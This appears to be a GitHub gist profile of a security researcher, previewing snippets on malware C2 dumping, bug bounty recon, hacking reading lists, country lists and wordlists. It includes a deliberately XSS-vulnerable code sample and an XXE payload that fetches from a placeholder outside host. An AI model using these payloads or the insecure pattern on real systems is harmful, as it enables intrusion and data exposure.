Skip to content

Instantly share code, notes, and snippets.

View SaFiSec's full-sized avatar
🎯
Focusing

HUNTER SaFiSec

🎯
Focusing
View GitHub Profile
import socket
import struct
def dump_c2_list(c2_list):
for i in range(0xFFFFFF):
ip = Dword(c2_list + (i*8))
if ip == 0:
break;
<!DOCTYPE html>
<!-- Vulnerable Code-->
<html>
<body>
<script>
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
</script>
@SaFiSec
SaFiSec / github_bugbountyhunting.md
Created July 17, 2019 20:00 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@SaFiSec
SaFiSec / raree.md
Created May 31, 2020 10:28 — forked from nonohry/raree.md
Awesome Collection Of Rare Hacking E-Books And PDF || 2018 Latest
@SaFiSec
SaFiSec / countries
Created June 2, 2020 16:29 — forked from kalinchernev/countries
Plain text list of countries
Afghanistan
Albania
Algeria
Andorra
Angola
Antigua & Deps
Argentina
Armenia
Australia
Austria
@SaFiSec
SaFiSec / README.markdown
Created June 2, 2020 16:31 — forked from marijn/README.markdown
List of countries in YAML, CSV and TXT format
@SaFiSec
SaFiSec / countries-hash.js
Created June 2, 2020 16:33 — forked from amabes/countries-hash.js
Countries Object (ES6)
export const countries = {
AF: 'Afghanistan',
AL: 'Albania',
DZ: 'Algeria',
AS: 'American Samoa',
AD: 'Andorra',
AO: 'Angola',
AI: 'Anguilla',
AQ: 'Antarctica',
AG: 'Antigua And Barbuda',
@SaFiSec
SaFiSec / content_discovery_all.txt
Created September 10, 2020 22:45 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
---

Getting Started

Https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 Chinese Https://wizardforcel.gitbooks.io/asani/content/ Easy to get Android security Chinese version Https://wizardforcel.gitbooks.io/lpad/content/ Android penetration test study manual Chinese version Https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web Penetration Test Cheats Chinese Version Https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit Development Primer Https://www.gitbook.com/book/t0data/burpsuite/details burpsuite actual guide Http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Penetration Testing Node.js Application Https://github.com/qazbnm456/awesome-web-security Web Security Information and Resources List

@SaFiSec
SaFiSec / XXE_payloads
Created October 27, 2020 19:11 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>